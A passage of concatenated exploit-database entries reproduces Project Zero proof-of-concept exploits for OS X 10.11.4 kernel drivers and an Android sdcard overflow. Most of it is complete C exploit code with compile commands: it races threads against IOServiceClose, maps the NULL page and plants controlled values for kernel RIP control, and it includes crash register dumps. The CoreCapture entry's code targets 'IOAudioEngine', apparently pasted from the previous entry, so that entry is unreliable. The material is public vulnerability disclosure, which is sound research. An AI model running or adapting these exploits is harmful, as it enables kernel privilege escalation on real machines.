global_conn = conn;
selector = 4;
inputScalarCnt = 0;
inputStructCnt = strlen(payload)+1;
strcpy((char*)inputStruct, payload);
outputScalarCnt = 0;
outputStructCnt = 0;
}
void make_iokit_call(){
IOConnectCallMethod(
global_conn,
selector,
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
}
OSSpinLock lock = OS_SPINLOCK_INIT;
void* thread_func(void* arg){
for(;;) {
int got_it = 0;
while (!got_it) {
got_it = OSSpinLockTry(&lock);
}
make_iokit_call();
}
return NULL;
}
int main(int argc, char** argv){
kern_return_t err;
OSSpinLockLock(&lock);
pthread_t t;
pthread_create(&t, NULL, thread_func, NULL);
mach_port_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("IOHDIXController"));
mach_port_t conn = MACH_PORT_NULL;
IOServiceOpen(service, mach_task_self(), 0, &conn);
set_params(conn);
for(;;) {
OSSpinLockUnlock(&lock);
CFTypeRef p = IORegistryEntryCreateCFProperty(service,
CFSTR("di-root-image-result"),
kCFAllocatorDefault,
0);
}
return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=774
The IOHIDFamily function IOHIDDevice::handleReportWithTime takes at attacker controlled unchecked IOHIDReportType enum,
which was cast from an int in either IOHIDLibUserClient::_setReport or _getReport:
ret = target->setReport(arguments->structureInput, arguments->structureInputSize, (IOHIDReportType)arguments->scalarInput[0]
handleReportWithTime only checks that the enum is <= the max, but enums are really just (signed) ints so there needs to be a lower-bounds
check here too:
if ( reportType >= kIOHIDReportTypeCount )
return kIOReturnBadArgument;
reportType is then used here:
element = GetHeadElement( GetReportHandlerSlot(reportID),
reportType);
while ( element ) {
shouldTickle |= element->shouldTickleActivity();
changed |= element->processReport( reportID,
where GetHeadElement is defined as:
#define GetHeadElement(slot, type) _reportHandlers[slot].head[type]
This leads to an OOB read off the head array followed by virtual function calls
Tested on OS X 10.11.4 (15E65) on MacBookAir 5,2
Note that repro'ing this might be more involved on other models as there are a lot of different HID devices and drivers.
I can provide panic logs if required.
*/
// ianbeer
// clang -o hidlib_oob hidlib_oob.c -framework IOKit -framework CoreFoundation
/*
OS X kernel OOB read of object pointer due to insufficient checks in raw cast to enum type
The IOHIDFamily function IOHIDDevice::handleReportWithTime takes at attacker controlled unchecked IOHIDReportType enum,
which was cast from an int in either IOHIDLibUserClient::_setReport or _getReport:
ret = target->setReport(arguments->structureInput, arguments->structureInputSize, (IOHIDReportType)arguments->scalarInput[0]
handleReportWithTime only checks that the enum is <= the max, but enums are really just (signed) ints so there needs to be a lower-bounds
check here too:
if ( reportType >= kIOHIDReportTypeCount )
return kIOReturnBadArgument;
reportType is then used here:
element = GetHeadElement( GetReportHandlerSlot(reportID),
reportType);
while ( element ) {
shouldTickle |= element->shouldTickleActivity();
changed |= element->processReport( reportID,
where GetHeadElement is defined as:
#define GetHeadElement(slot, type) _reportHandlers[slot].head[type]
This leads to an OOB read off the head array followed by virtual function calls
Tested on OS X 10.11.4 (15E65) on MacBookAir 5,2
Note that repro'ing this might be more involved on other models as there are a lot of different HID devices and drivers.
I can provide panic logs if required.
*/
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/time.h>
#include <unistd.h>
#include <libkern/OSAtomic.h>
#include <mach/mach_error.h>
#include <IOKit/IOKitLib.h>
#include <CoreFoundation/CoreFoundation.h>
io_connect_t get_user_client(const char* name, int type) {
kern_return_t err;
CFDictionaryRef matching;
io_service_t service;
// try IOServiceMatching
matching = IOServiceMatching(name);
service = IOServiceGetMatchingService(kIOMasterPortDefault, matching); // consume a ref on matching
if (service == MACH_PORT_NULL) {
// try IOServiceNameMatching
matching = IOServiceNameMatching(name);
service = IOServiceGetMatchingService(kIOMasterPortDefault, matching);
}
if (service == MACH_PORT_NULL) {
// try everything and look for a partial name match
matching = IOServiceMatching("IOService");
io_iterator_t iterator;
IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
int found_it = 0;
while ((service = IOIteratorNext(iterator)) != IO_OBJECT_NULL) {
io_name_t object_name;
IOObjectGetClass(service, object_name);
if (strstr(object_name, name)) {
found_it = 1;
break;
}
IOObjectRelease(service);
}
IOObjectRelease(iterator);
if (!found_it) {
// couldn't find any matches for the name anywhere
return MACH_PORT_NULL;
}
}
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), type, &conn);
if (err != KERN_SUCCESS){
printf("IOServiceOpen failed: %s\n", mach_error_string(err));
IOObjectRelease(service);
return MACH_PORT_NULL;
}
IOObjectRelease(service);
return conn;
}
kern_return_t poc(io_connect_t client){
unsigned int selector;
uint64_t inputScalar[16];
size_t inputScalarCnt = 0;
uint8_t inputStruct[4096];
size_t inputStructCnt = 0;
uint64_t outputScalar[16];
uint32_t outputScalarCnt = 0;
char outputStruct[4096];
size_t outputStructCnt = 0;
inputScalar[0] = 0xe0000000; // cast to an enum (int) and no lower-bounds check
inputScalar[1] = 0x00a90000;
inputScalar[2] = 0;
inputScalarCnt = 3;
outputStructCnt = 0x1000;
selector = 12;
return IOConnectCallMethod(
client,
selector,
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
}
int main(int argc, char** argv){
io_connect_t client = get_user_client("AppleUSBTCButtons", 0);
if (client == MACH_PORT_NULL) {
printf("no client\n");
return 1;
}
poc(client);
return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=776
IOAudioEngineUserClient::closeClient sets the audioEngine member pointer to NULL
IOReturn IOAudioEngineUserClient::closeClient()
{
audioDebugIOLog(3, "+ IOAudioEngineUserClient[%p]::closeClient()\n", this);
if (audioEngine && !isInactive()) {
if (isOnline()) {
stopClient();
}
audioEngine->clientClosed(this);
audioEngine = NULL;
External method 0 uses audioEngine without checking if it's NULL:
IOReturn IOAudioEngineUserClient::safeRegisterClientBuffer(UInt32 audioStreamIndex, void * sourceBuffer, UInt32 bufSizeInBytes, UInt32 bufferSetID) {
audioDebugIOLog(3, "IOAudioEngineUserClient::safeRegisterClientBuffer deprecated for 32 bit %p \n", sourceBuffer);
IOAudioStream * audioStream;
IOReturn result = kIOReturnBadArgument;
audioDebugIOLog(3, "+ IOAudioEngineUserClient::safeRegisterClientBuffer32 %p \n", sourceBuffer);
audioStream = audioEngine->getStreamForID(audioStreamIndex);
Whilst that isn't a virtual method, getStreamForID does call a virtual function on a member:
IOAudioStream * IOAudioEngine::getStreamForID(UInt32 streamID) {
IOAudioStream * stream = NULL;
assert(reserved);
if (reserved->streams) {
stream = OSDynamicCast (IOAudioStream, reserved->streams->getObject(streamID));
}
return stream;
}
getObject is a virtual function, and reserved will be read from the NULL page giving us easy RIP control.
tested on OS X 10.11.4 (15E65) MacBookAir 5,2
*/
// ianbeer
// clang -o ioaudio_race ioaudio_race.c -framework IOKit -m32 -lpthread -pagezero_size 0x0
/*
OS X exploitable kernel NULL pointer dereference in IOAudioEngine
IOAudioEngineUserClient::closeClient sets the audioEngine member pointer to NULL
IOReturn IOAudioEngineUserClient::closeClient()
{
audioDebugIOLog(3, "+ IOAudioEngineUserClient[%p]::closeClient()\n", this);
if (audioEngine && !isInactive()) {
if (isOnline()) {
stopClient();
}
audioEngine->clientClosed(this);
audioEngine = NULL;
External method 0 uses audioEngine without checking if it's NULL:
IOReturn IOAudioEngineUserClient::safeRegisterClientBuffer(UInt32 audioStreamIndex, void * sourceBuffer, UInt32 bufSizeInBytes, UInt32 bufferSetID) {
audioDebugIOLog(3, "IOAudioEngineUserClient::safeRegisterClientBuffer deprecated for 32 bit %p \n", sourceBuffer);
IOAudioStream * audioStream;
IOReturn result = kIOReturnBadArgument;
audioDebugIOLog(3, "+ IOAudioEngineUserClient::safeRegisterClientBuffer32 %p \n", sourceBuffer);
audioStream = audioEngine->getStreamForID(audioStreamIndex);
Whilst that isn't a virtual method, getStreamForID does call a virtual function on a member:
IOAudioStream * IOAudioEngine::getStreamForID(UInt32 streamID) {
IOAudioStream * stream = NULL;
assert(reserved);
if (reserved->streams) {
stream = OSDynamicCast (IOAudioStream, reserved->streams->getObject(streamID));
}
return stream;
}
getObject is a virtual function, and reserved will be read from the NULL page giving us easy RIP control.
tested on OS X 10.11.4 (15E65) MacBookAir 5,2
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <IOKit/IOKitLib.h>
#include <libkern/OSAtomic.h>
#include <mach/thread_act.h>
#include <pthread.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <sys/mman.h>
unsigned int selector = 0;
uint64_t inputScalar[16];
size_t inputScalarCnt = 0;
uint8_t inputStruct[40960];
size_t inputStructCnt = 0;
uint64_t outputScalar[16] = {0};
uint32_t outputScalarCnt = 0;
char outputStruct[40960] = {0};
size_t outputStructCnt = 0;
io_connect_t global_conn = MACH_PORT_NULL;
void set_params(io_connect_t conn){
global_conn = conn;
selector = 0;
inputScalarCnt = 4;
inputStructCnt = 0;
outputScalarCnt = 16;
outputStructCnt = 40960;
}
void make_iokit_call(){
IOConnectCallMethod(
global_conn,
selector,
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
}
OSSpinLock lock = OS_SPINLOCK_INIT;
void* thread_func(void* arg){
int got_it = 0;
while (!got_it) {
got_it = OSSpinLockTry(&lock);
}
// usleep(1);
make_iokit_call();
return NULL;
}
mach_port_t get_user_client(char* name, int type) {
kern_return_t err;
CFMutableDictionaryRef matching = IOServiceMatching(name);
if(!matching){
printf("unable to create service matching dictionary\n");
return 0;
}
io_iterator_t iterator;
err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
if (err != KERN_SUCCESS){
printf("no matches\n");
return 0;
}
io_service_t service = IOIteratorNext(iterator);
if (service == IO_OBJECT_NULL){
printf("unable to find service\n");
return 0;
}
printf("got service: %x\n", service);
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), type, &conn);
if (err != KERN_SUCCESS){
printf("unable to get user client connection\n");
return 0;
}
printf("got userclient connection: %x\n", conn);
return conn;
}
int main(int argc, char** argv){
kern_return_t err;
// re map the null page rw
int var = 0;
err = vm_deallocate(mach_task_self(), 0x0, 0x1000);
if (err != KERN_SUCCESS){
printf("%x\n", err);
}
vm_address_t addr = 0;
err = vm_allocate(mach_task_self(), &addr, 0x1000, 0);
if (err != KERN_SUCCESS){
if (err == KERN_INVALID_ADDRESS){
printf("invalid address\n");
}
if (err == KERN_NO_SPACE){
printf("no space\n");
}
printf("%x\n", err);
}
char* np = 0;
for (int i = 0; i < 0x1000; i++){
np[i] = '\xff';
}
*((uint64_t*)0x28) = 0xffffff4141414141;
OSSpinLockLock(&lock);
pthread_t t;
pthread_create(&t, NULL, thread_func, NULL);
mach_port_t conn = get_user_client("IOAudioEngine", 0);
set_params(conn);
OSSpinLockUnlock(&lock);
IOServiceClose(conn);
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=777
Pretty much all the external methods of CoreCaptureUserClient call CoreCaptureUserClient::stashGet passing an attacker controlled key.
If that key isn't in the list of stashed objects then stashGet returns a NULL pointer. No callers actually check
the return value though which leads immediately to a call to a virtual method on a NULL pointer. By mapping the NULL
page we can get trivial RIP control.
Tested on OS X 10.11.4 (15E65) on MacBookAir 5,2
*/
// ianbeer
//clang -o CoreCaptureNull CoreCaptureNull.c -framework IOKit -m32 -lpthread -pagezero_size 0x0
/*
OS X exploitable kernel NULL dereference in CoreCaptureResponder due to unchecked return value
Pretty much all the external methods of CoreCaptureUserClient call CoreCaptureUserClient::stashGet passing an attacker controlled key.
If that key isn't in the list of stashed objects then stashGet returns a NULL pointer. No callers actually check
the return value though which leads immediately to a call to a virtual method on a NULL pointer. By mapping the NULL
page we can get trivial RIP control.
Tested on OS X 10.11.4 (15E65) on MacBookAir 5,2
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <IOKit/IOKitLib.h>
#include <libkern/OSAtomic.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <sys/mman.h>
unsigned int selector = 0;
uint64_t inputScalar[16];
size_t inputScalarCnt = 0;
uint8_t inputStruct[40960];
size_t inputStructCnt = 0;
uint64_t outputScalar[16] = {0};
uint32_t outputScalarCnt = 0;
char outputStruct[40960] = {0};
size_t outputStructCnt = 0;
io_connect_t global_conn = MACH_PORT_NULL;
void set_params(io_connect_t conn){
global_conn = conn;
selector = 0;
inputScalarCnt = 4;
inputStructCnt = 0;
outputScalarCnt = 16;
outputStructCnt = 40960;
}
void make_iokit_call(){
IOConnectCallMethod(
global_conn,
selector,
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
}
OSSpinLock lock = OS_SPINLOCK_INIT;
void* thread_func(void* arg){
int got_it = 0;
while (!got_it) {
got_it = OSSpinLockTry(&lock);
}
// usleep(1);
make_iokit_call();
return NULL;
}
mach_port_t get_user_client(char* name, int type) {
kern_return_t err;
CFMutableDictionaryRef matching = IOServiceMatching(name);
if(!matching){
printf("unable to create service matching dictionary\n");
return 0;
}
io_iterator_t iterator;
err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
if (err != KERN_SUCCESS){
printf("no matches\n");
return 0;
}
io_service_t service = IOIteratorNext(iterator);
if (service == IO_OBJECT_NULL){
printf("unable to find service\n");
return 0;
}
printf("got service: %x\n", service);
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), type, &conn);
if (err != KERN_SUCCESS){
printf("unable to get user client connection\n");
return 0;
}
printf("got userclient connection: %x\n", conn);
return conn;
}
int main(int argc, char** argv){
kern_return_t err;
// re map the null page rw
int var = 0;
err = vm_deallocate(mach_task_self(), 0x0, 0x1000);
if (err != KERN_SUCCESS){
printf("%x\n", err);
}
vm_address_t addr = 0;
err = vm_allocate(mach_task_self(), &addr, 0x1000, 0);
if (err != KERN_SUCCESS){
if (err == KERN_INVALID_ADDRESS){
printf("invalid address\n");
}
if (err == KERN_NO_SPACE){
printf("no space\n");
}
printf("%x\n", err);
}
char* np = 0;
for (int i = 0; i < 0x1000; i++){
np[i] = '\xff';
}
*((uint64_t*)0x28) = 0xffffff4141414141;
OSSpinLockLock(&lock);
pthread_t t;
pthread_create(&t, NULL, thread_func, NULL);
mach_port_t conn = get_user_client("IOAudioEngine", 0);
set_params(conn);
OSSpinLockUnlock(&lock);
IOServiceClose(conn);
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=778
IOAccelerator external method IOAccelSharedUserClient2::page_off_resource uses the pointer at this+0x100 without checking if it's NULL.
A series of dereferences from this pointer lead to trivial RIP control.
We can race two threads, in one call the external method and in the other call IOServiceClose, which NULLs out the pointer at
this+0x100.
By mapping the NULL page into userspace we can control the pointer read.
tested on OS X 10.11.4 (15E65) on MacBookAir 5,2
*/
//ianbeer
//clang -o ioaccel_race ioaccel_race.c -framework IOKit -m32 -lpthread -pagezero_size 0x0
/*
OS X exploitable kernel NULL dereference in IOAccelSharedUserClient2::page_off_resource
IOAccelerator external method IOAccelSharedUserClient2::page_off_resource uses the pointer at this+0x100 without checking if it's NULL.
A series of dereferences from this pointer lead to trivial RIP control.
We can race two threads, in one call the external method and in the other call IOServiceClose, which NULLs out the pointer at
this+0x100.
By mapping the NULL page into userspace we can control the pointer read.
tested on OS X 10.11.4 (15E65) on MacBookAir 5,2
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <IOKit/IOKitLib.h>
#include <libkern/OSAtomic.h>
#include <mach/thread_act.h>
#include <pthread.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <sys/mman.h>
unsigned int selector = 0;
uint64_t inputScalar[16];
size_t inputScalarCnt = 0;
uint8_t inputStruct[40960];
size_t inputStructCnt = 0;
uint64_t outputScalar[16] = {0};
uint32_t outputScalarCnt = 0;
char outputStruct[40960] = {0};
size_t outputStructCnt = 0;
io_connect_t global_conn = MACH_PORT_NULL;
void set_params(io_connect_t conn){
global_conn = conn;
selector = 2;
inputScalarCnt = 0;
inputStructCnt = 8;
outputScalarCnt = 0;
outputStructCnt = 0;
}
void make_iokit_call(){
IOConnectCallMethod(
global_conn,
selector,
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
}
OSSpinLock lock = OS_SPINLOCK_INIT;
void* thread_func(void* arg){
int got_it = 0;
while (!got_it) {
got_it = OSSpinLockTry(&lock);
}
// usleep(1);
make_iokit_call();
return NULL;
}
mach_port_t get_user_client(char* name, int type) {
kern_return_t err;
CFMutableDictionaryRef matching = IOServiceMatching(name);
if(!matching){
printf("unable to create service matching dictionary\n");
return 0;
}
io_iterator_t iterator;
err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
if (err != KERN_SUCCESS){
printf("no matches\n");
return 0;
}
io_service_t service = IOIteratorNext(iterator);
if (service == IO_OBJECT_NULL){
printf("unable to find service\n");
return 0;
}
printf("got service: %x\n", service);
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), type, &conn);
if (err != KERN_SUCCESS){
printf("unable to get user client connection\n");
return 0;
}
printf("got userclient connection: %x\n", conn);
return conn;
}
void poc(){
OSSpinLockLock(&lock);
pthread_t t;
pthread_create(&t, NULL, thread_func, NULL);
mach_port_t conn = get_user_client("IntelAccelerator", 6);
set_params(conn);
OSSpinLockUnlock(&lock);
IOServiceClose(conn);
pthread_join(t, NULL);
}
int main(int argc, char** argv){
kern_return_t err;
// re map the null page rw
int var = 0;
err = vm_deallocate(mach_task_self(), 0x0, 0x1000);
if (err != KERN_SUCCESS){
printf("%x\n", err);
}
vm_address_t addr = 0;
err = vm_allocate(mach_task_self(), &addr, 0x1000, 0);
if (err != KERN_SUCCESS){
if (err == KERN_INVALID_ADDRESS){
printf("invalid address\n");
}
if (err == KERN_NO_SPACE){
printf("no space\n");
}
printf("%x\n", err);
}
char* np = 0;
for (int i = 0; i < 0x1000; i++){
np[i] = '\x41';
}
for(;;) {
poc();
}
return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=782
AppleGraphicsDeviceControlClient doesn't check that its pointer to its IOService (at this+0xd8) is non-null before using it
in all external methods.
We can set this pointer to NULL by racing two threads, one of which calls IOServiceClose which NULLs out the pointer and the
other of which makes any external method call.
By mapping the NULL page in userspace this gives us trivial kernel RIP control as the code makes a virtual call on a NULL object pointer.
tested on OS X 10.11.4 (15E65) MacBookPro 10,1
*/
// ianbeer
// clang -o graphicscontrol_race graphicscontrol_race.c -framework IOKit -m32 -lpthread -pagezero_size 0x0
/*
OS X exploitable kernel NULL pointer dereference in AppleGraphicsDeviceControl
AppleGraphicsDeviceControlClient doesn't check that its pointer to its IOService (at this+0xd8) is non-null before using it
in all external methods.
We can set this pointer to NULL by racing two threads, one of which calls IOServiceClose which NULLs out the pointer and the
other of which makes any external method call.
By mapping the NULL page in userspace this gives us trivial kernel RIP control as the code makes a virtual call on a NULL object pointer.
tested on OS X 10.11.4 (15E65) MacBookPro 10,1
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <IOKit/IOKitLib.h>
#include <libkern/OSAtomic.h>
#include <mach/thread_act.h>
#include <pthread.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <sys/mman.h>
unsigned int selector = 0;
uint64_t inputScalar[16];
size_t inputScalarCnt = 0;
uint8_t inputStruct[40960];
size_t inputStructCnt = 0;
uint64_t outputScalar[16] = {0};
uint32_t outputScalarCnt = 0;
char outputStruct[40960] = {0};
size_t outputStructCnt = 0;
io_connect_t global_conn = MACH_PORT_NULL;
void set_params(io_connect_t conn){
global_conn = conn;
selector = 0; /// anything :)
inputScalarCnt = 0;
inputStructCnt = 0;
outputScalarCnt = 16;
outputStructCnt = 4096;
}
void make_iokit_call(){
IOConnectCallMethod(
global_conn,
selector,
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
}
OSSpinLock lock = OS_SPINLOCK_INIT;
void* thread_func(void* arg){
int got_it = 0;
while (!got_it) {
got_it = OSSpinLockTry(&lock);
}
// usleep(1);
make_iokit_call();
OSSpinLockUnlock(&lock);
return NULL;
}
mach_port_t get_user_client(char* name, int type) {
kern_return_t err;
CFMutableDictionaryRef matching = IOServiceMatching(name);
if(!matching){
printf("unable to create service matching dictionary\n");
return 0;
}
io_iterator_t iterator;
err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
if (err != KERN_SUCCESS){
printf("no matches\n");
return 0;
}
io_service_t service = IOIteratorNext(iterator);
if (service == IO_OBJECT_NULL){
printf("unable to find service\n");
return 0;
}
printf("got service: %x\n", service);
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), type, &conn);
if (err != KERN_SUCCESS){
printf("unable to get user client connection\n");
return 0;
}
printf("got userclient connection: %x\n", conn);
return conn;
}
void poc() {
OSSpinLockLock(&lock);
pthread_t t;
pthread_create(&t, NULL, thread_func, NULL);
mach_port_t conn = get_user_client("NVDC", 0);
set_params(conn);
OSSpinLockUnlock(&lock);
IOServiceClose(conn);
pthread_join(t, NULL);
}
int main(int argc, char** argv){
kern_return_t err;
// re map the null page rw
int var = 0;
err = vm_deallocate(mach_task_self(), 0x0, 0x1000);
if (err != KERN_SUCCESS){
printf("%x\n", err);
}
vm_address_t addr = 0;
err = vm_allocate(mach_task_self(), &addr, 0x1000, 0);
if (err != KERN_SUCCESS){
if (err == KERN_INVALID_ADDRESS){
printf("invalid address\n");
}
if (err == KERN_NO_SPACE){
printf("no space\n");
}
printf("%x\n", err);
}
char* np = 0;
for (int i = 0; i < 0x1000; i++){
np[i] = '\x41';
}
for (;;) {
poc();
}
return 0;
}
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=798
Android: Stack-buffer-overflow in /system/bin/sdcard
There's an integer overflow issue in get_node_path_locked, which results in
a buffer overflow. For all of the calling paths, this is going to overflow a
stack buffer in the parent function:
static ssize_t get_node_path_locked(struct node* node, char* buf, size_t bufsize) {
const char* name;
size_t namelen;
if (node->graft_path) {
name = node->graft_path;
namelen = node->graft_pathlen;
} else if (node->actual_name) {
name = node->actual_name;
namelen = node->namelen;
} else {
name = node->name;
namelen = node->namelen;
}
// when bufsize == namelen + 1
if (bufsize < namelen + 1) {
return -1;
}
ssize_t pathlen = 0;
if (node->parent && node->graft_path == NULL) {
// bufsize - namelen - 2 overflows to SIZE_MAX
pathlen = get_node_path_locked(node->parent, buf, bufsize - namelen - 2);
if (pathlen < 0) {
return -1;
}
buf[pathlen++] = '/';
}
memcpy(buf + pathlen, name, namelen + 1); /* include trailing \0 */
return pathlen + namelen;
}
This can be triggered by a malicious app creating a directory structure in
/sdcard with a total path length longer than PATH_MAX, which can be achieved by
creating a directory heirarchy starting with several directories with short
names and later renaming these parent directories to have longer names. See the
attached POC, which can be run from the 'untrusted_app' selinux domain.
It appears that the overflow is close enough to the bottom of the stack that
with a large overflow we can corrupt thread data that is used before the stack
cookie is checked, suggesting that this issue is possibly exploitable despite
the presence of stack cookies.
(gdb) i r
r0 0xb 11
r1 0x1 1
r2 0x41414199 1094795673
r3 0x41414141 1094795585
r4 0x80000000 2147483648
r5 0x0 0
r6 0xb6e40ec0 3068399296
r7 0xb6cbe860 3066816608
r8 0xb6e4930c 3068433164
r9 0xb6e3c594 3068380564
r10 0xbee4c9ac 3202664876
r11 0xb6943180 3063165312
r12 0xb6e3c908 3068381448
sp 0xb6cbe7a0 0xb6cbe7a0
lr 0xb6e1daad -1226712403
pc 0xb6e06ade 0xb6e06ade <pthread_getspecific(pthread_key_t)+34>
cpsr 0x80070030 -2147024848
(gdb) x/10i $pc
=> 0xb6e06ade <pthread_getspecific(pthread_key_t)+34>: ldr r4, [r2, #100] ; 0x64
0xb6e06ae0 <pthread_getspecific(pthread_key_t)+36>: cmp r4, r1
0xb6e06ae2 <pthread_getspecific(pthread_key_t)+38>: bne.n 0xb6e06aec <pthread_getspecific(pthread_key_t)+48>
0xb6e06ae4 <pthread_getspecific(pthread_key_t)+40>: ldr r0, [r2, #104] ; 0x68
0xb6e06ae6 <pthread_getspecific(pthread_key_t)+42>: pop {r4, pc}
0xb6e06ae8 <pthread_getspecific(pthread_key_t)+44>: movs r0, #0
0xb6e06aea <pthread_getspecific(pthread_key_t)+46>: pop {r4, pc}
0xb6e06aec <pthread_getspecific(pthread_key_t)+48>: adds r0, #12
0xb6e06aee <pthread_getspecific(pthread_key_t)+50>: add.w r12, r3, r0, lsl #3
0xb6e06af2 <pthread_getspecific(pthread_key_t)+54>: movs r0, #0
(gdb) bt
#0 0xb6e06ade in pthread_getspecific (key=11) at bionic/libc/bionic/pthread_key.cpp:160
#1 0xb6e1daac in je_tsd_wrapper_get () at external/jemalloc/include/jemalloc/internal/tsd.h:609
#2 je_tsd_get () at external/jemalloc/include/jemalloc/internal/tsd.h:609
#3 je_tsd_fetch () at external/jemalloc/include/jemalloc/internal/tsd.h:614
#4 imalloc_body (usize=<synthetic pointer>, tsd=<synthetic pointer>, size=4) at external/jemalloc/src/jemalloc.c:1401
#5 je_malloc (size=4) at external/jemalloc/src/jemalloc.c:1423
#6 0xb6f3bb3e in handle_open (fuse=0xbee478c8, hdr=0xbee4c984, req=<optimized out>, handler=<optimized out>)
at system/core/sdcard/sdcard.c:1193
#7 0x41414140 in ?? ()
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39921.zip
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=783
The method AppleGraphicsControlClient::checkArguments does actually appear to test whether the pointer at this+0xd8 is non-null, but uses it anyway :)
We can race external methods which call this with another thread calling IOServiceClose to get a NULL pointer there.
By mapping the NULL page in userspace this gives us trivial kernel RIP control as the code makes a virtual call on a NULL object pointer.
tested on OS X 10.11.4 (15E65) MacBookPro 10,1
*/
// ianbeer
// clang -o mux_control_race mux_control_race.c -framework IOKit -m32 -lpthread -pagezero_size 0x0
/*
OS X exploitable kernel NULL pointer dereference in AppleMuxControl.kext
The method AppleGraphicsControlClient::checkArguments does actually appear to test whether the pointer at this+0xd8 is non-null, but uses it anyway :)
We can race external methods which call this with another thread calling IOServiceClose to get a NULL pointer there.
By mapping the NULL page in userspace this gives us trivial kernel RIP control as the code makes a virtual call on a NULL object pointer.
tested on OS X 10.11.4 (15E65) MacBookPro 10,1
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <IOKit/IOKitLib.h>
#include <libkern/OSAtomic.h>
#include <mach/thread_act.h>
#include <pthread.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <sys/mman.h>
unsigned int selector = 0;
uint64_t inputScalar[16];
size_t inputScalarCnt = 0;
uint8_t inputStruct[40960];
size_t inputStructCnt = 0;
uint64_t outputScalar[16] = {0};
uint32_t outputScalarCnt = 0;
char outputStruct[40960] = {0};
size_t outputStructCnt = 0;
io_connect_t global_conn = MACH_PORT_NULL;
void set_params(io_connect_t conn){
global_conn = conn;
selector = 9; // getAGCData
inputScalarCnt = 0;
inputStructCnt = 0;
outputScalarCnt = 16;
outputStructCnt = 4096;
}
void make_iokit_call(){
IOConnectCallMethod(
global_conn,
selector,
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
}
OSSpinLock lock = OS_SPINLOCK_INIT;
void* thread_func(void* arg){
int got_it = 0;
while (!got_it) {
got_it = OSSpinLockTry(&lock);
}
// usleep(1);
make_iokit_call();
OSSpinLockUnlock(&lock);
return NULL;
}
mach_port_t get_user_client(char* name, int type) {
kern_return_t err;
CFMutableDictionaryRef matching = IOServiceMatching(name);
if(!matching){
printf("unable to create service matching dictionary\n");
return 0;
}
io_iterator_t iterator;
err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
if (err != KERN_SUCCESS){
printf("no matches\n");
return 0;
}
io_service_t service = IOIteratorNext(iterator);
if (service == IO_OBJECT_NULL){
printf("unable to find service\n");
return 0;
}
printf("got service: %x\n", service);
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), type, &conn);
if (err != KERN_SUCCESS){
printf("unable to get user client connection\n");
return 0;
}
printf("got userclient connection: %x\n", conn);
return conn;
}
void poc() {
OSSpinLockLock(&lock);
pthread_t t;
pthread_create(&t, NULL, thread_func, NULL);
mach_port_t conn = get_user_client("AppleMuxControl", 0);
set_params(conn);
OSSpinLockUnlock(&lock);
IOServiceClose(conn);
pthread_join(t, NULL);
}
int main(int argc, char** argv){
kern_return_t err;
// re map the null page rw
int var = 0;
err = vm_deallocate(mach_task_self(), 0x0, 0x1000);
if (err != KERN_SUCCESS){
printf("%x\n", err);
}
vm_address_t addr = 0;
err = vm_allocate(mach_task_self(), &addr, 0x1000, 0);
if (err != KERN_SUCCESS){
if (err == KERN_INVALID_ADDRESS){
printf("invalid address\n");
}
if (err == KERN_NO_SPACE){
printf("no space\n");
}
printf("%x\n", err);
}
char* np = 0;
for (int i = 0; i < 0x1000; i++){
np[i] = '\x41';
}
for (;;) {
poc();
}
return 0;
}